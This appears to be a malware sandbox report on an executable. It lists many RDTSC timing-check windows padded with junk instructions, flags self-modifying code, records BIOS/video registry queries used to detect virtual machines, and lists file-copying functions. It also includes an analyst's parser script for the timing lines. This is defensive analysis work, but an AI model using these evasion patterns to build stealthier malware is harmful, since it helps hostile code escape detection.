                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 641AEE second address: 641AF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63FB1D second address: 63FB23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63FB23 second address: 63FB27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63FF80 second address: 63FF89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63FF89 second address: 63FF8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6401AE second address: 6401BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 je 00007F2398D03473h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6404B3 second address: 6404BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6408E0 second address: 6408E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6408E6 second address: 6408EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 640AA5 second address: 640AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 640AAB second address: 640AAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6411A9 second address: 6411B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2398D03456h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647603 second address: 647626 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C065h 0x00000007 jng 00007F239852C056h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647626 second address: 64762A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64762A second address: 647630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647786 second address: 64778C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657ECC second address: 657ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F239852C056h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657BAE second address: 657BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657BB2 second address: 657BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A35F second address: 65A36D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2398D03456h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A36D second address: 65A375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A375 second address: 65A37B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66788E second address: 66789F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jc 00007F239852C056h 0x0000000d pop ebx 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66789F second address: 6678A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66E921 second address: 66E925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66EA95 second address: 66EAAE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F2398D0345Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F01D second address: 66F02F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F239852C05Bh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 66F9FD second address: 66FA17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F2398D03464h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 66FA17 second address: 66FA28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F239852C05Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 66FA28 second address: 66FA2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 66FA2C second address: 66FA35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 66FA35 second address: 66FA3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 672F01 second address: 672F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 672F07 second address: 672F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 672F0F second address: 672F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F239852C05Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 674EBC second address: 674EC1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 674EC1 second address: 674ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 674ECA second address: 674ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 682195 second address: 6821D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C067h 0x00000007 jmp 00007F239852C064h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edi 0x0000000f jc 00007F239852C064h 0x00000015 push esi 0x00000016 jbe 00007F239852C056h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 68202D second address: 68204C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007F2398D03468h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 67D8BF second address: 67D8C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 67D8C3 second address: 67D8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F2398D0345Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jnl 00007F2398D03456h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 68EEBF second address: 68EEC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 68EEC4 second address: 68EEDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2398D03464h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6918CF second address: 6918D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6918D3 second address: 6918FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 jc 00007F2398D0345Ah 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 jmp 00007F2398D03463h 0x00000018 pop ecx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6918FD second address: 691905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A26F0 second address: 6A26F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A26F4 second address: 6A2717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F239852C056h 0x00000011 jmp 00007F239852C062h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A2717 second address: 6A271F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A271F second address: 6A2732 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F239852C05Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a je 00007F239852C056h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A289C second address: 6A28BA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2398D03458h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnp 00007F2398D03458h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A2B75 second address: 6A2B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A2B7F second address: 6A2B84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A2FC4 second address: 6A2FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A3110 second address: 6A3131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 jmp 00007F2398D03464h 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A3131 second address: 6A3135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A3135 second address: 6A313F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2398D03456h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A4EE4 second address: 6A4EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F239852C05Bh 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A4EF4 second address: 6A4F23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D03466h 0x00000007 pushad 0x00000008 jmp 00007F2398D03464h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A4F23 second address: 6A4F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F239852C056h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A4F36 second address: 6A4F4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D0345Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F2398D03456h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A4F4E second address: 6A4F58 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F239852C056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A4F58 second address: 6A4F5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A79C6 second address: 6A79CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A79CC second address: 6A79D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A7DCB second address: 6A7DE2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F239852C05Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A7DE2 second address: 6A7DEC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2398D03456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A8F40 second address: 6A8F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F239852C05Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6AC710 second address: 6AC715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6AC715 second address: 6AC72E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jo 00007F239852C056h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6AC72E second address: 6AC74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2398D03468h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6AC74D second address: 6AC752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CF031A second address: 4CF031E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CF031E second address: 4CF033B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C069h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CF033B second address: 4CF0359 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D03461h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov eax, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f movsx ebx, si 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CF040E second address: 4CF041D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C05Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CF041D second address: 4CF0486 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2398D03462h 0x00000009 sbb ecx, 61F3D9A8h 0x0000000f jmp 00007F2398D0345Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 jmp 00007F2398D03466h 0x0000001e push eax 0x0000001f pushad 0x00000020 mov eax, edx 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 jmp 00007F2398D03466h 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c mov ax, 25BDh 0x00000030 push eax 0x00000031 push edx 0x00000032 mov ah, 0Ch 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CF0486 second address: 4CF048A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CF048A second address: 4CF0499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 pushad 0x00000009 mov ah, dl 0x0000000b push eax 0x0000000c push edx 0x0000000d mov al, FFh 0x0000000f rdtsc
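Each interceptor line above records one window between two consecutive rdtsc reads, with the packer's padding in between: balanced push/pop pairs, pushad/popad, unconditional jmp, and conditional jumps used as opaque predicates. The script below is an added example (not code from the report or from the sample) that parses those lines into windows and reports, per window, the byte span between the two reads, the net stack effect, the amount of pure padding and the number of conditional branches. The three embedded lines are copied from the report; the stack-effect table is the ordinary 32-bit x86 one.

```python
"""Parse the "RDTSC instruction interceptor" lines of a Joe Sandbox report and
summarise the timing-check windows they describe.  Added example; not part of
the report or the analysed sample."""
import re
from dataclasses import dataclass, field

# Three interceptor lines copied from the report above.
SAMPLE_REPORT = r"""
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 66F9FD second address: 66FA17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F2398D03464h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 66FA2C second address: 66FA35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 682195 second address: 6821D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C067h 0x00000007 jmp 00007F239852C064h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edi 0x0000000f jc 00007F239852C064h 0x00000015 push esi 0x00000016 jbe 00007F239852C056h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
"""

LINE_RE = re.compile(r"First address: ([0-9A-Fa-f]+) second address: ([0-9A-Fa-f]+) instructions: (.*)")
# "0x<offset> <mnemonic operands>" repeated; the lookahead ends each instruction at the next offset.
INSN_RE = re.compile(r"0x([0-9a-fA-F]{8})\s+(.*?)(?=\s+0x[0-9a-fA-F]{8}\s|$)")
# Net stack slots per mnemonic on 32-bit x86 (pushad/popad move all eight GPRs).
STACK_EFFECT = {"push": 1, "pop": -1, "pushad": 8, "popad": -8, "pushfd": 1, "popfd": -1}


@dataclass
class Window:
    first: int                                   # address of the first rdtsc
    second: int                                  # address of the next rdtsc
    insns: list = field(default_factory=list)    # (offset, "mnemonic operands")

    @property
    def span(self):
        """Code bytes between the two rdtsc reads."""
        return self.second - self.first

    def mnemonics(self):
        return [text.split()[0] for _, text in self.insns]

    def stack_delta(self):
        """Net stack effect; non-zero means the eax:edx save/restore straddles windows."""
        return sum(STACK_EFFECT.get(m, 0) for m in self.mnemonics())

    def junk_pairs(self):
        """push X immediately undone by pop X, or pushad/popad: pure padding."""
        texts = [text for _, text in self.insns]
        return sum(1 for a, b in zip(texts, texts[1:])
                   if (a.startswith("push ") and b == "pop " + a[5:]) or (a, b) == ("pushad", "popad"))

    def conditional_jumps(self):
        """jc/jbe/jl/...: opaque predicates mixed into the delay code."""
        return sum(1 for m in self.mnemonics() if m.startswith("j") and m != "jmp")


def parse_windows(text):
    windows = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        w = Window(int(m.group(1), 16), int(m.group(2), 16))
        w.insns = [(int(off, 16), insn.strip()) for off, insn in INSN_RE.findall(m.group(3))]
        names = w.mnemonics()
        if names[:1] == ["rdtsc"] and names[-1:] == ["rdtsc"]:   # every window is rdtsc ... rdtsc
            windows.append(w)
    return windows


def summarize(windows):
    """The aggregate an analyst wants: how many checks, where, and how much padding."""
    return {
        "windows": len(windows),
        "lowest_address": min(w.first for w in windows),
        "highest_address": max(w.second for w in windows),
        "max_span_bytes": max(w.span for w in windows),
        "instructions": sum(len(w.insns) for w in windows),
        "junk_pairs": sum(w.junk_pairs() for w in windows),
        "conditional_jumps": sum(w.conditional_jumps() for w in windows),
    }


if __name__ == "__main__":
    ws = parse_windows(SAMPLE_REPORT)
    for w in ws:
        print(f"{w.first:06X}-{w.second:06X} span={w.span:3d} insns={len(w.insns):2d} "
              f"stack={w.stack_delta():+d} junk={w.junk_pairs()} cjmp={w.conditional_jumps()}")
    print(summarize(ws))
```

Feed it the full set of interceptor lines and the two clusters become visible at once: the 66F9FD..6AC752 range inside the packer stub, and the 4CF031A..4CF0499 range where the unpacked code is running. The conditional-jump count separates plain delay padding (the 66F9FD window) from the opaque-predicate variant (the 682195 window); a non-zero stack delta is expected where the packer's save of eax:edx is undone in a later window.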
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 411AC2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 5E6D41 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 4119A2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 64E9F2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_001C38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001C4910
